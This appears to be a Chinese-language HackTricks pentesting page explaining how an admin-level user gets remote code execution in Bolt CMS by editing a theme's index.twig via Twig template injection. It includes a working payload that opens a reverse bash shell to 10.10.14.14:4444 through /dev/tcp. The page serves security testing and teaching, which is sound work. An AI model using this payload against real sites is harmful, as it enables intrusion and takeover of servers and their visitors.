Bolt CMS

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式：

如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
探索PEASS家族，我们的独家NFTs收藏品
加入 💬 Discord群 或 电报群 或在Twitter上关注我们 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

RCE

在以管理员身份登录后（转到 /bot 以访问登录提示），您可以在Bolt CMS中获得RCE：

选择 Configuration -> View Configuration -> Main Configuration 或转到URL路径 /bolt/file-edit/config?file=/bolt/config.yaml
检查主题的值

选择 File management -> View & edit templates
选择前一步中找到的主题基础（在这种情况下为 base-2021）并选择 index.twig
在我的情况下，这在URL路径 /bolt/file-edit/themes?file=/base-2021/index.twig 中
通过模板注入（Twig）在此文件中设置您的有效负载，例如：{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
然后保存更改

在 Maintenance -> Clear the cache 中清除缓存
以普通用户身份再次访问页面，有效负载应该被执行

上一页Artifactory Hacking guide 下一页Buckets

最后更新于1年前